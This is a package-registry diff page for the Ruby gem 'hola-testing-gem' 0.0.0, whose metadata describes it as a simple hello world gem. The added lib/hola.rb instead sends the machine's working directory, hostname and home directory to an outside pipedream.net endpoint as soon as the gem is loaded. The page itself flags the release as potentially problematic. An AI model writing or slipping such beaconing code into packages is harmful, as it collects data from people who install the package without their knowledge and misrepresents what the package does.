hola-testing-gem 0.0.0-arm64-darwin-19

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of hola-testing-gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hola.rb +6 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 4d408914e118a623dba55e4449cbb624e7c57c7618134315cfbdbd3c250ed815
4
+ data.tar.gz: 0bafdaf5c4dcba3293865745db963e705ceebdae3be6570426f48504a2bb17a2
5
+ SHA512:
6
+ metadata.gz: 984b572cb30954decf0a641a7a1ee6cf6a1eec81dc93c1168020fe591ce4552afe513c0e5f046898176f76a707abc4a6d56ff80eb8964bfeacef1478d837f8c6
7
+ data.tar.gz: 110a068dc91924a1bffc3a43d065da48704ae5dc0b7f71837ee56a2212349c388e08a0a3cc42a753bccb90c33aba4c7cf9fe3c8e4fef5cab848473ef667f97ef
data/lib/hola.rb ADDED
@@ -0,0 +1,6 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+ url = "https://enhwr81xye7ad.x.pipedream.net"
5
+ Net::HTTP.post(URI(url), "cwd:#{Dir.pwd};hostname:#{Socket.gethostname};home:#{Dir.home};gem:GEM_NAME")
6
+
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hola-testing-gem
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.0
5
+ platform: arm64-darwin-19
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-05-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/hola.rb
20
+ homepage: https://rubygems.org/gems/hola-testing-gem
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.0.3.1
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Hola!
43
+ test_files: []